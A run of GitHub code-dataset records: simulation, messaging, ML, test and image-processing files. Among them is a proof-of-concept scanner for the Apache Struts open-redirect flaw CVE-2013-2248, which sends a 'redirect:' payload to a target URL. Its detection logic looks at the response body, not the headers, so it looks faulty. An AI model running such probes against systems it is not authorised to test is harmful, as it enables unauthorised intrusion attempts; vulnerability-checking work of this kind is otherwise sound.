min_action = state.min_visitations\n if min_visits < t_board:\n return state.actions[min_action]\n\n return state.policy_action if random.random() > self.epsilon else np.random.choice(state.actions)\n\n def simulate_agent(self, agent: sb.Agent, iteration_num, **kwargs):\n \"\"\"simulate one action of an agent, and re-grade it, according to it's new state\"\"\"\n\n state_action = self.choose_action(agent.curr_state, agent.type, kwargs['T_board'])\n\n agent.last_activation = iteration_num\n reward, next_state = self.sample_state_action(agent.type, state_action)\n agent.update(reward, next_state)\n\n def reset(self):\n self.reset_agents(self.agents.qsize())\n\n def reset_agents(self, agents_num):\n self.agents = Q.PriorityQueue()\n for i in range(agents_num):\n init_state = self.choose_init_state()\n self.agents.put(PrioritizedObject(sb.Agent(i, init_state), (-np.inf, 0)))\n\n @property\n def agents_location(self):\n chains_count = Counter([agent.object.chain for agent in self.agents.queue])\n return chains_count\n\n\nclass GTAgentSimulator(AgentSimulator):\n def __init__(self, sim_input: ProblemInput):\n self.bad_activated_states = 0\n self.gittins = {}\n self.indexes_vec = []\n self.gt_indexes_vec = []\n super().__init__(sim_input)\n\n def simulate(self, sim_input):\n return super().simulate(sim_input), self.indexes_vec[1:], self.gt_indexes_vec[1:]\n\n def sim_evaluate(self, **kwargs):\n kwargs['bad_activated_states'] = self.bad_activated_states\n super().sim_evaluate(**kwargs)\n\n def simulate_one_step(self, agents_to_run, **kwargs):\n possible_states, activated_states = super().simulate_one_step(agents_to_run, **kwargs)\n\n wrongly_activated = 0\n states_order = [(self.gittins[state][0], state) for state in possible_states]\n heapq.heapify(states_order)\n optimal_states = [heapq.heappop(states_order)[1] for _ in range(len(activated_states))]\n\n optimal_counter = Counter(optimal_states)\n chosen_counter = Counter(activated_states)\n\n # a list of states that are optimal, but weren't activated by the prioritizer\n 
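# Counter.elements() yields each state id once per remaining count, so multiplicity is preserved\n        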
optimal_not_activated = [self.gittins[state][1] for state in (optimal_counter - chosen_counter).elements()]\n\n # iterate through states that were activated, but aren't optimal.\n # If a sub-optimal activated state's gittins index is equal to one from the optimal not activated,\n # choosing it was not a mistake\n for state in (chosen_counter - optimal_counter).elements():\n state_grade = self.gittins[state][1]\n if state_grade in optimal_not_activated:\n optimal_not_activated.remove(state_grade)\n else:\n wrongly_activated += 1\n\n self.bad_activated_states += wrongly_activated\n\n def calc_index_vec(self, sim_input):\n self.indexes_vec.append([self.graded_states[key][1] for key in range(self.model.MDP.n)])\n\n p_gt, r_gt = self.get_stats_for_prioritizer('gittins', sim_input.parameter)\n gt_prioritizer = Pr.GittinsPrioritizer(states=self.model.states,\n policy=self.policy,\n p=p_gt,\n r=r_gt,\n temporal_extension=sim_input.temporal_extension,\n discount_factor=sim_input.gittins_discount)\n\n self.gittins = gt_prioritizer.grade_states()\n self.gt_indexes_vec.append([self.gittins[key][1] for key in range(self.model.MDP.n)])\n\n def init_simulation(self, sim_input):\n self.calc_index_vec(sim_input)\n\n def improve_policy(self, sim_input, **kwargs):\n super().improve_policy(sim_input, **kwargs)\n self.calc_index_vec(sim_input)\n\n\ndef SimulatorFactory(new_mdp: sb.MDPModel, sim_params, gt_compare):\n if gt_compare:\n simulator = GTAgentSimulator\n else:\n simulator = AgentSimulator\n\n return simulator(ProblemInput(sim_params, sb.SimulatedModel(new_mdp)))\n\n\ndef SimInputFactory(method_type, parameter, sim_params):\n simulation_input_type = AgentSimulationInput\n\n if method_type == 'random':\n parameter = None\n prioritizer = Pr.Prioritizer\n elif method_type == 'gittins':\n prioritizer = Pr.GittinsPrioritizer\n elif method_type == 'greedy':\n prioritizer = Pr.GreedyPrioritizer\n elif method_type == 'model_free':\n prioritizer = Pr.ModelFreeGittinsPrioritizer\n else:\n raise IOError('unrecognized method type:' + method_type)\n\n return simulation_input_type(method_type, prioritizer, parameter, sim_params)\n","repo_name":"NaamaPearl/GittinsProject","sub_path":"Simulator/Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":15882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4001915048","text":"import pika\nimport cv2\nimport numpy as np\nimport pyautogui\n\n# RabbitMQ configuration\nrabbitmq_host = 'localhost'\nrabbitmq_queue = 'camera_frames'\n\n# Connect to RabbitMQ\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host=rabbitmq_host))\nchannel = connection.channel()\n\n# Declare the queue\nchannel.queue_declare(queue=rabbitmq_queue)\n\n# Get screen dimensions\nscreen_width, screen_height = pyautogui.size()\n\n# Calculate the position to display the image at the bottom-right corner\nimage_width, image_height = 0, 0 # Initialize image dimensions\n\nbCenter = True\n\n# Callback function for receiving messages\ndef receive_message(ch, method, properties, body):\n global bCenter\n # Convert the received byte array to an image\n nparr = np.frombuffer(body, np.uint8)\n image = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n # Display the image at the bottom-right corner of the screen\n cv2.imshow('Received Image', image)\n\n if bCenter:\n # Update image dimensions\n image_height, image_width = image.shape[:2]\n\n # Calculate position to display the image at the bottom-right corner\n x = screen_width - 
image_width\n y = screen_height - image_height\n cv2.moveWindow('Received Image', x, y)\n bCenter = False\n\n # Check for the 'q' key to exit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n exit()\n\n# Consume messages from RabbitMQ\nchannel.basic_consume(queue=rabbitmq_queue, on_message_callback=receive_message, auto_ack=True)\n\n# Start consuming\nchannel.start_consuming()\n","repo_name":"surachairobotic/ws_enserv","sub_path":"rtsp2kafka/rabbitmq2vdo.py","file_name":"rabbitmq2vdo.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2039326014","text":"# coding=utf-8\nfrom test import BaseUITestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nimport json\n\n\nclass ChromeIndexTestCase(BaseUITestCase):\n def setUp(self):\n super(ChromeIndexTestCase, self).setUp()\n self.chrome_webdriver = webdriver.Chrome(executable_path=self.chrome_executable_path)\n\n def test_check_load_json(self):\n driver = self.chrome_webdriver\n driver.get(\"http://localhost:8001/\")\n element = driver.find_element_by_xpath(\"//textarea[@ref='query_text']\")\n element.send_keys('{\"~\":[\"id\"]}')\n element = driver.find_element_by_xpath(\"//button[@ref='load_json']\")\n element.click()\n WebDriverWait(driver, 10).until(\n ec.visibility_of_element_located((By.XPATH, \"//div[@ref='load_data_modal']\")))\n element = driver.find_element_by_xpath(\"//textarea[@ref='url_input']\")\n element.send_keys('https://jsonplaceholder.typicode.com/posts/1')\n element = driver.find_element_by_xpath(\"//button[@ref='load_data']\")\n element.click()\n WebDriverWait(driver, 10).until(\n ec.invisibility_of_element_located((By.XPATH, \"//div[@ref='load_data_modal']\")))\n element = driver.find_element_by_xpath(\"//button[@ref='execute_query']\")\n element.click()\n WebDriverWait(driver, 10).until(\n ec.visibility_of_element_located((By.XPATH, \"//table[@ref='data_table']\")))\n element = driver.find_element_by_xpath(\"//table[@ref='data_table']\")\n assert \"dataTable\" in element.get_attribute(\"class\")\n\n def tearDown(self):\n self.chrome_webdriver.close()\n","repo_name":"m19t12/simpleARS-Playground","sub_path":"test/test_chrome_index.py","file_name":"test_chrome_index.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"967721543","text":"import json\nfrom kafka import KafkaConsumer, KafkaProducer\nimport numpy as np \n\n# local module\nimport s3\nimport object_detection\nfrom logger import logger\nfrom config import KAFKA_HOST, KAFKA_PORT, KAFKA_TOPIC_OBJECT_IMAGE, KAFKA_TOPIC_OBJECT_RESULT\n\n\n# parse numpy object to json\ndef numpy_default(obj):\n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n\n\ndef main():\n # Setup Kafka Consumer\n consumer = KafkaConsumer(KAFKA_TOPIC_OBJECT_IMAGE,\n bootstrap_servers='{}:{}'.format(\n KAFKA_HOST, KAFKA_PORT),\n auto_offset_reset='earliest',\n enable_auto_commit=True,\n group_id='object-detection-group')\n # Setup Kafka Producer\n producer = KafkaProducer(\n bootstrap_servers='{}:{}'.format(KAFKA_HOST, KAFKA_PORT))\n\n logger.info(\"Ready to receive 
messages\")\n\n    for message in consumer:\n        # de-serialize\n        message_str = message.value.decode('utf-8')\n        message_json = json.loads(message_str)\n        logger.info(\"Input message: %s\", message_str)\n\n        # Get image from S3\n        image_stream = s3.get_file_stream(message_json['image_path'])\n\n        # detect object in image\n        detected_image, detections = object_detection.detect(image_stream)\n\n        # result message\n        result = {\n            'image_path': message_json['image_path'],\n            'detections': detections\n        }\n\n        # Send result message\n        dumped_result = json.dumps(result, default=numpy_default)\n        producer.send(KAFKA_TOPIC_OBJECT_RESULT,\n                      value=dumped_result.encode('utf-8'))\n        logger.info(\"Output message: %s\", dumped_result)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"senior-project-spai/object-detection","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"5533738173","text":"import os\r\nimport cv2\r\nimport glob\r\nimport numpy as np\r\nimport math\r\n\r\nfrom argparse import ArgumentParser\r\nimport shutil\r\n \r\nparser = ArgumentParser()\r\nparser.add_argument('--loc', help='Folder containing the input')\r\nparser.add_argument('--number_frames', default=70, type=int, help='If the input is a video, set how many frames should be extracted from it')\r\nargs = parser.parse_args()\r\n\r\nif os.path.isdir(f'{args.loc}/image'):\r\n    imgs = []\r\n    for ext in ['*.png', '*.jpg', '*.JPEG', '*.JPG']:\r\n        imgs.extend(glob.glob(os.path.join(f'{args.loc}/image/', ext)))\r\n    print(len(imgs))\r\n    if len(imgs) < 1:\r\n        print(\"There are no images!\")\r\n    else:\r\n        print(\"Images detected\")\r\nelse:\r\n    video_path = glob.glob(os.path.join(f'{args.loc}/*.mp4'))\r\n    if len(video_path) == 1:\r\n        print(\"Video detected\")\r\n        MAX_FRAMES = args.number_frames\r\n\r\n        video = cv2.VideoCapture(video_path[0])\r\n        if video.isOpened() == False : \r\n            print(\"Error\")\r\n\r\n        frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\r\n        print(f'Total frames: {frame_count}')\r\n\r\n        if frame_count > MAX_FRAMES:\r\n            step = math.ceil(frame_count / MAX_FRAMES)\r\n        else:\r\n            step = 1\r\n\r\n        # step = 1  # debug override that ignored --number_frames; left disabled\r\n\r\n        print(f'Step: {step}')\r\n\r\n        os.makedirs(f'{args.loc}/image')\r\n\r\n        count = 0\r\n        written_no = 0\r\n        while video.isOpened():\r\n            ret, frame = video.read()\r\n            if ret == True:\r\n                if count % step == 0:\r\n                    if written_no < 10:\r\n                        cv2.imwrite(f'{args.loc}/image/00{written_no}.png', frame)\r\n                    else:\r\n                        cv2.imwrite(f'{args.loc}/image/0{written_no}.png', frame)\r\n                    written_no += 1\r\n                count += 1\r\n            else:\r\n                break\r\n    else:\r\n        print(\"No image or video found\")","repo_name":"ahnaf1393/Learning-Neural-Surface-Representations","sub_path":"check_input.py","file_name":"check_input.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"75192194171","text":"class User:\r\n    def __init__(self, username, name, email):\r\n        self.username = username\r\n        self.name = name\r\n        self.email = email\r\n        print(\"user has been created successfully\")\r\n\r\nmamon = User(\"m@m0n\", \"mamkundu\", \"mamkundu@gamil.coom\")\r\n\r\nprint(mamon.email)","repo_name":"Sagkun343/Hackerrank-","sub_path":"aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"655264527","text":"import requests\nimport 
re\n\n\n# Vuln Base Info\ndef info():\n return {\n \"author\": \"cckuailong\",\n \"name\": '''Apache Struts - Multiple Open Redirection Vulnerabilities''',\n \"description\": '''Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.''',\n \"severity\": \"low\",\n \"references\": [\n \"https://www.exploit-db.com/exploits/38666\", \n \"https://nvd.nist.gov/vuln/detail/CVE-2013-2248\", \n \"https://cwiki.apache.org/confluence/display/WW/S2-017\"\n ],\n \"classification\": {\n \"cvss-metrics\": \"\",\n \"cvss-score\": \"\",\n \"cve-id\": \"CVE-2013-2248\",\n \"cwe-id\": \"\"\n },\n \"metadata\":{\n \"vuln-target\": \"\",\n \n },\n \"tags\": [\"cve\", \"cve2013\", \"apache\", \"redirect\", \"struts\"],\n }\n\n\n# Vender Fingerprint\ndef fingerprint(url):\n return True\n\n# Proof of Concept\ndef poc(url):\n result = {}\n try:\n url = format_url(url)\n path = '/index.action?redirect:http://www.example.com/'\n\n resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)\n if re.search(r'(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com.*$', resp.text): \n result[\"success\"] = True\n result[\"info\"] = info()\n result[\"payload\"] = url+path\n\n except:\n result[\"success\"] = False\n \n return result\n\n\n# Exploit, can be same with poc()\ndef exp(url):\n return poc(url)\n\n\n# Utils\ndef format_url(url):\n url = url.strip()\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url = 'http://' + url\n url = url.rstrip('/')\n\n return url","repo_name":"cckuailong/reapoc","sub_path":"2013/CVE-2013-2248/poc/pocsploit/CVE-2013-2248.py","file_name":"CVE-2013-2248.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":641,"dataset":"github-code","pt":"78"} +{"seq_id":"33115954581","text":"from http import HTTPStatus\n\nfrom backend.extensions import mail\n\n\ndef test_contact_us_endpoint(client, new_msg):\n \"\"\"Test sending valid message to send-email enndoint.\"\"\"\n with mail.record_messages() as outbox:\n rv = client.post(\"/send-email/\", json=new_msg)\n response = rv.get_json()\n\n assert rv.status_code == HTTPStatus.OK\n assert response[\"message\"] == \"Contact message successfully sent\"\n assert len(outbox) == 1\n assert outbox[0].sender == \"test@test.com\"\n assert \"Lorem Ipsum\" in outbox[0].body\n\n\ndef test_contact_us_without_email(client, new_msg):\n \"\"\"Test sending message with no email provided.\"\"\"\n del new_msg[\"email\"]\n rv = client.post(\"/send-email/\", json=new_msg)\n response = rv.get_json()[\"message\"]\n\n assert rv.status_code == HTTPStatus.BAD_REQUEST\n assert response[\"email\"][\"message\"] == \"Valid email is required\"\n\n\ndef test_contact_us_without_content(client, new_msg):\n \"\"\"Test sending message with no content provided.\"\"\"\n del new_msg[\"content\"]\n rv = client.post(\"/send-email/\", json=new_msg)\n response = rv.get_json()[\"message\"]\n\n assert rv.status_code == HTTPStatus.BAD_REQUEST\n assert response[\"content\"][\"message\"] == \"Content of message is required\"\n","repo_name":"jacekkalbarczyk/cfp_aws","sub_path":"backend/tests/test_contact_us.py","file_name":"test_contact_us.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21085903364","text":"import sys\nfastin = sys.stdin.readline\nn = int(fastin())\nk = int(fastin())\nd = 
[[0] * (k+1) for _ in range(n+1)]\nif n / k < 2 : \n    print(0)\n    sys.exit()\nif k == 1 : \n    print(n)\n    sys.exit()\nfor i in range(1,n+1):\n    d[i][1] = i\nfor i in range(4,n+1):\n    for j in range(2, k+1):\n        d[i][j] = d[i-1][j] + d[i-2][j-1]\n\nprint(d[n][k] % 1000000003)","repo_name":"SquirtlesAlgorithmStudy/SquirtlesAlgorithmStudy-S12","sub_path":"의진/Week 12/색상환.py","file_name":"색상환.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"74256664570","text":"from sklearn.model_selection import LeaveOneOut\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\n\r\n\r\n\r\ndef loo_knn_def(x,y):\r\n    global model\r\n    loo = LeaveOneOut()\r\n    loo.get_n_splits(x)\r\n    scores_knn = []\r\n    for train_index, test_index in loo.split(x):\r\n\r\n        x_treino, x_teste = x[train_index], x[test_index]\r\n        y_treino, y_teste = y[train_index], y[test_index]\r\n        \r\n        model = KNeighborsClassifier(n_neighbors=9, weights= \"uniform\")\r\n        model.fit(x_treino,y_treino)\r\n        predi = model.predict(x_teste)\r\n        scores_knn.append(metrics.accuracy_score(y_teste,predi))\r\n\r\n    # return only after every leave-one-out fold has run; the old in-loop\r\n    # return stopped the cross-validation after the first split\r\n    return model\r\n\r\ndef random_search(x, y):\r\n    knn = loo_knn_def(x, y)\r\n    parameters = {'n_neighbors':range(1,10),'weights':['uniform','distance']}\r\n    rs = RandomizedSearchCV(knn,parameters,n_iter=10,refit=True)\r\n    rs.fit(x,y)\r\n    print(rs.best_params_)","repo_name":"Iagoakiosaito/IA-ChatBot-UFMS","sub_path":"ChatBot/loo_knn.py","file_name":"loo_knn.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"13281747994","text":"\"\"\"\nURL of problem:\nhttps://leetcode.com/problems/number-of-provinces/\n\"\"\"\n\n\nfrom collections import deque\n\n\nclass Solution:\n    def findCircleNum(self, isConnected):\n        \"\"\"\n        :type isConnected: List[List[int]]\n        :rtype: int\n        \"\"\"\n        # Time: O(#cities + #connections) - BFS runtime\n        # Space: O(#cities) - for unvisited_cities and queue\n        # Tags: Graphs, BFS\n        num_provinces = 0\n        unvisited_cities = set(range(len(isConnected)))\n        while unvisited_cities:\n            queue = deque([unvisited_cities.pop()])\n            num_provinces += 1\n            while queue:\n                city = queue.popleft()\n                for idx, is_nbr in enumerate(isConnected[city]):\n                    if idx in unvisited_cities and is_nbr:\n                        unvisited_cities.remove(idx)\n                        queue.append(idx)\n\n        return num_provinces\n\n\n    def findCircleNum_DFS(self, isConnected):\n        \"\"\"\n        :type isConnected: List[List[int]]\n        :rtype: int\n        \"\"\"\n        # A DFS solution\n        num_provinces = 0\n        unvisited_cities = set(range(len(isConnected)))\n        while unvisited_cities:\n            stack = [unvisited_cities.pop()]\n            num_provinces += 1\n            while stack:\n                city = stack.pop()\n                for idx, is_nbr in enumerate(isConnected[city]):\n                    if idx in unvisited_cities and is_nbr:\n                        unvisited_cities.remove(idx)\n                        stack.append(idx)\n\n        return num_provinces\n\n\ndef main():\n    print(Solution().findCircleNum([[1, 0, 0], [0, 1, 0], [0, 0, 1]]))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"atg-abhijay/Google-Interview-Prep","sub_path":"Graph/num_provinces_547.py","file_name":"num_provinces_547.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"}
{"seq_id":"3014362251","text":"from allennlp.common.testing import AllenNlpTestCase\nfrom allennlp.models.archival import 
load_archive\nfrom allennlp.predictors import Predictor\nfrom allennlp.nn import util\n\n\nclass TestPredictor(AllenNlpTestCase):\n    def test_from_archive_does_not_consume_params(self):\n        archive = load_archive(\n            self.FIXTURES_ROOT / \"simple_tagger\" / \"serialization\" / \"model.tar.gz\"\n        )\n        Predictor.from_archive(archive, \"sentence_tagger\")\n\n        # If it consumes the params, this will raise an exception\n        Predictor.from_archive(archive, \"sentence_tagger\")\n\n    def test_loads_correct_dataset_reader(self):\n        # This model has a different dataset reader configuration for train and validation. The\n        # parameter that differs is the token indexer's namespace.\n        archive = load_archive(\n            self.FIXTURES_ROOT / \"simple_tagger_with_span_f1\" / \"serialization\" / \"model.tar.gz\"\n        )\n\n        predictor = Predictor.from_archive(archive, \"sentence_tagger\")\n        assert predictor._dataset_reader._token_indexers[\"tokens\"].namespace == \"test_tokens\"\n\n        predictor = Predictor.from_archive(\n            archive, \"sentence_tagger\", dataset_reader_to_load=\"train\"\n        )\n        assert predictor._dataset_reader._token_indexers[\"tokens\"].namespace == \"tokens\"\n\n        predictor = Predictor.from_archive(\n            archive, \"sentence_tagger\", dataset_reader_to_load=\"validation\"\n        )\n        assert predictor._dataset_reader._token_indexers[\"tokens\"].namespace == \"test_tokens\"\n\n    def test_get_gradients(self):\n        inputs = {\n            \"sentence\": \"I always write unit tests\",\n        }\n\n        archive = load_archive(\n            self.FIXTURES_ROOT / \"basic_classifier\" / \"serialization\" / \"model.tar.gz\"\n        )\n        predictor = Predictor.from_archive(archive)\n\n        instance = predictor._json_to_instance(inputs)\n        predictor._dataset_reader.apply_token_indexers(instance)\n        outputs = predictor._model.forward_on_instance(instance)\n        labeled_instances = predictor.predictions_to_labeled_instances(instance, outputs)\n        for instance in labeled_instances:\n            grads = predictor.get_gradients([instance])[0]\n            assert \"grad_input_1\" in grads\n            assert grads[\"grad_input_1\"] is not None\n            assert len(grads[\"grad_input_1\"][0]) == 5  # 5 words in the sentence\n\n    def test_get_gradients_when_requires_grad_is_false(self):\n        inputs = {\n            \"sentence\": \"I always write unit tests\",\n        }\n\n        archive = load_archive(\n            self.FIXTURES_ROOT\n            / \"basic_classifier\"\n            / \"embedding_with_trainable_is_false\"\n            / \"model.tar.gz\"\n        )\n        predictor = Predictor.from_archive(archive)\n\n        # ensure that requires_grad is initially False on the embedding layer\n        embedding_layer = util.find_embedding_layer(predictor._model)\n        assert not embedding_layer.weight.requires_grad\n        instance = predictor._json_to_instance(inputs)\n        predictor._dataset_reader.apply_token_indexers(instance)\n        outputs = predictor._model.forward_on_instance(instance)\n        labeled_instances = predictor.predictions_to_labeled_instances(instance, outputs)\n        # ensure that gradients are always present, despite requires_grad being false on the embedding layer\n        for instance in labeled_instances:\n            grads = predictor.get_gradients([instance])[0]\n            assert bool(grads)\n        # ensure that no side effects remain\n        assert not embedding_layer.weight.requires_grad\n\n    def test_captures_model_internals(self):\n        inputs = {\"sentence\": \"I always write unit tests\"}\n\n        archive = load_archive(\n            self.FIXTURES_ROOT\n            / \"basic_classifier\"\n            / \"embedding_with_trainable_is_false\"\n            / \"model.tar.gz\"\n        )\n        predictor = Predictor.from_archive(archive)\n\n        with predictor.capture_model_internals() as internals:\n            predictor.predict_json(inputs)\n\n        assert 
len(internals) == 10\n\n with predictor.capture_model_internals(r\"_text_field_embedder.*\") as internals:\n predictor.predict_json(inputs)\n assert len(internals) == 2\n\n def test_predicts_batch_json(self):\n inputs = {\"sentence\": \"I always write unit tests\"}\n\n archive = load_archive(\n self.FIXTURES_ROOT\n / \"basic_classifier\"\n / \"embedding_with_trainable_is_false\"\n / \"model.tar.gz\"\n )\n predictor = Predictor.from_archive(archive)\n results = predictor.predict_batch_json([inputs] * 3)\n assert len(results) == 3\n","repo_name":"allenai/allennlp","sub_path":"tests/predictors/predictor_test.py","file_name":"predictor_test.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":11609,"dataset":"github-code","pt":"78"} +{"seq_id":"1663288295","text":"\"\"\"\nStores the Image class, and its subclasses.\n\"\"\"\n\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom PIL import Image as PILImage\nimport pywt\nfrom scipy.ndimage import uniform_filter, gaussian_filter\nfrom sklearn.cluster import DBSCAN\n\nfrom .cluster import Cluster\n\n\ndef _wavelet_freqs_below_length_scale(length_scale: int, wavelet_type: str):\n \"\"\"\n Calculates the number of wavelet frequency scales that exist below the\n given length scale.\n \"\"\"\n if wavelet_type != \"sym4\":\n raise NotImplementedError(\n \"The only implemented wavelet choice is 'sym4'. If you would \" +\n \"like a different wavelet type, please raise an issue on the \" +\n \"local_stats github page.\")\n # Wavelet length scales increase by powers of 2.\n return int(np.floor(np.log2(length_scale)))\n\n\nclass Image:\n \"\"\"\n The base class for all images.\n\n Attrs:\n image_array:\n Numpy array representing the image.\n \"\"\"\n\n def __init__(self, image_array: np.ndarray) -> None:\n self.image_array = image_array\n\n @classmethod\n def from_file(cls, path_to_file: str):\n \"\"\"\n Instantiates an image from a path to a data file that can be opened\n using PIL.Image.open().\n\n Args:\n path_to_file:\n The path to the image file of interest.\n\n Returns:\n An instance of Image.\n \"\"\"\n return cls(np.array(PILImage.open(path_to_file)).astype(np.float64))\n\n def subtract_background(self, background_array: np.ndarray,\n zero_clip=True) -> None:\n \"\"\"\n Carried out a simple background subtraction on self.image_array. If\n zero_clip is true, then any pixels in image_array that are decreased\n below zero by the background subtraction will be clipped to zero. This\n is particularly useful if there's a hot pixel in your background array.\n\n Args:\n background_array:\n A numpy array representing the background to be subtracted.\n OR\n An instance of Image representing the background.\n zero_clip:\n Boolean determining if the background subtracted image_array\n should be clipped at 0.\n \"\"\"\n if isinstance(background_array, type(self)):\n background_array = background_array.image_array\n self.image_array -= background_array\n if zero_clip:\n self.image_array = np.clip(self.image_array, 0, np.inf)\n\n def wavelet_denoise(self,\n signal_length_scale: int = 20,\n cutoff_factor: float = 0.2,\n max_cutoff_factor: float = 0.8,\n wavelet_choice: str = \"sym4\") -> None:\n \"\"\"\n Runs some wavelet denoising on the image. Without arguments, will run\n default denoising.\n\n Args:\n signal_length_scale:\n We would like to preferentially rotate our image away from\n wavelets whose length-scales are decently smaller than our\n signal length scale. 
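# A minimal, self-contained sketch of the coefficient-thresholding idea the
# wavelet_denoise method above implements, assuming a 1-D signal and the same
# "sym4" wavelet; the 0.2 cutoff factor is illustrative, not prescriptive.
import numpy as np
import pywt

def threshold_denoise(signal, wavelet="sym4", cutoff_factor=0.2):
    # Decompose, zero out coefficients that are small relative to the largest
    # one (small coefficients mostly encode noise), then invert the transform.
    coeffs = pywt.wavedec(signal, wavelet)
    max_coeff = max(np.max(np.abs(c)) for c in coeffs)
    cutoff = cutoff_factor * max_coeff
    coeffs = [np.where(np.abs(c) >= cutoff, c, 0.0) for c in coeffs]
    return pywt.waverec(coeffs, wavelet)

noisy = np.sin(np.linspace(0, 8 * np.pi, 256)) + 0.1 * np.random.randn(256)
denoised = threshold_denoise(noisy)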
This is the most important parameter for\n decimating noise wavelets. A value of 20 will kill most typical\n noise wavelets, but if your signal length scale is significantly\n larger than 20 pixels then it may be productive to increase this\n number.\n cutoff_factor:\n If any wavelet coefficient is less than cutoff_factor*(maximum\n wavelet coefficient), then set it to zero. The idea is that\n small coefficients are required to represent noise; meaningful\n data, as long as it is large compared to background, will\n require large coefficients to be constructed in the wavelet\n representation.\n max_cutoff_factor:\n The cutoff factor to be applied to signal occuring on length\n scales much smaller than signal_length_scale.\n wavelet_choice:\n Fairly arbitrary. Sym4 is the only currently supported wavelet.\n Look at http://wavelets.pybytes.com/ for more info. If you want\n a new wavelet supported, please feel free to raise an issue on\n the github page.\n \"\"\"\n # Work out how many high frequency levels will have the max_cutoff\n # applied to them.\n max_noise_length = signal_length_scale/2\n max_cutoff_levels = _wavelet_freqs_below_length_scale(max_noise_length,\n wavelet_choice)\n\n # Get the wavelet coefficients; cast them to a mutable type.\n coeffs = list(pywt.wavedec(self.image_array, wavelet_choice))\n # Work out the largest wavelet coefficient.\n max_coeff = 0\n for arr in coeffs:\n max_coeff = np.max(arr) if np.max(arr) > max_coeff else max_coeff\n\n # Get min_coeff from the arguments to this method.\n min_coeff = max_coeff*cutoff_factor\n high_freq_min_coeff = max_coeff*max_cutoff_factor\n\n for i in range(max_cutoff_levels):\n idx = -(i+1)\n coeffs[idx] = np.where(\n ((coeffs[idx] > high_freq_min_coeff).any() or\n (coeffs[idx] < -high_freq_min_coeff).any()).any(),\n coeffs[idx], 0)\n\n # Apply the decimation.\n coeffs = [np.where(\n ((arr > min_coeff).any() or (arr < -min_coeff).any()).any(), arr, 0\n ) for arr in coeffs]\n\n # Invert the wavelet transformation.\n self.image_array = pywt.waverec(coeffs, wavelet_choice)\n\n def _significance_levels(self, signal_length_scale: int,\n bkg_length_scale: int) -> np.ndarray:\n \"\"\"\n Returns an image of the local significance level of every pixel in the\n image.\n\n TODO: this should be replaced by optimized numpy extension function.\n\n Args:\n signal_length_scale:\n The length scale over which signal is present. This is usually\n just a few pixels for typical magnetic diffraction data.\n bkg_length_scale:\n The length scale over which background level varies in a CCD\n image. If your CCD is perfect, you can set this to the number\n of pixels in a detector, but larger numbers will run more\n slowly. Typically something like 1/10th of the number of pixels\n in your detector is probably sensible.\n\n Returns:\n Array of standard deviations between the mean and each pixel.\n \"\"\"\n # Compute local statistics.\n local_signal = gaussian_filter(\n self.image_array, int(signal_length_scale/3))\n local_bkg_levels = uniform_filter(local_signal, bkg_length_scale)\n local_deviation = np.std(local_signal)\n\n return np.abs((local_signal - local_bkg_levels)/local_deviation)\n\n def _significant_pixels(self, signal_length_scale: int,\n bkg_length_scale: int,\n n_sigma: float = 4,\n significance_mask: np.ndarray = None) -> None:\n \"\"\"\n Returns a significance map of the pixels in self.data.\n\n Args:\n signal_length_scale:\n The length scale over which signal is present. 
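# Hedged sketch of the local-significance statistic described above: smooth at
# the signal scale, estimate the slowly varying background at a larger scale,
# and express each pixel's deviation in units of the standard deviation. The
# random frame and the two length scales here are stand-in assumptions.
import numpy as np
from scipy.ndimage import gaussian_filter, uniform_filter

def significance_map(image, signal_length_scale=6, bkg_length_scale=100):
    smoothed = gaussian_filter(image, max(int(signal_length_scale / 3), 1))
    background = uniform_filter(smoothed, bkg_length_scale)
    sigma = np.std(smoothed)
    return np.abs((smoothed - background) / sigma)

frame = np.random.default_rng(0).normal(size=(256, 256))
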